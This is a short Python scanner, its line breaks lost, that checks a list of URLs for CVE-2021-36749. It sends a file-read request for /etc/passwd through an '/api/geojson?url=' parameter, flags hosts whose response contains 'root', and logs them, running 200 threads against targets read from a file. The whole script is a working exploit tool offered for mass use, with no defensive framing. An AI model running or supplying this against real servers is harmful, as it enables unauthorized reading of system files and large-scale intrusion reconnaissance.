def verify(urls): url = urls + '/api/geojson?url=file:/etc/passwd' headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} try: res = requests.get(url, headers=headers, timeout=10, verify=False, allow_redirects=False) if 'root' in res.text: info = "[+] 存在CVE-2021-36749漏洞: " + urls save_vuln(info) print(info) except Exception as e: # print(e) pass
def save_vuln(info): vuln = info + '\n' with open("vuln.txt", 'a', encoding='utf-8') as ff: ff.write(vuln)
def get_file_url(): with open("url.txt", 'r', encoding='UTF-8') as f: _urls = f.readlines() urls = [url.strip() for url in _urls if url and url.strip()] return urls
if __name__ == "__main__": url = get_file_url() pool = threadpool.ThreadPool(200) res = threadpool.makeRequests(verify, url) [pool.putRequest(req) for req in res] pool.wait()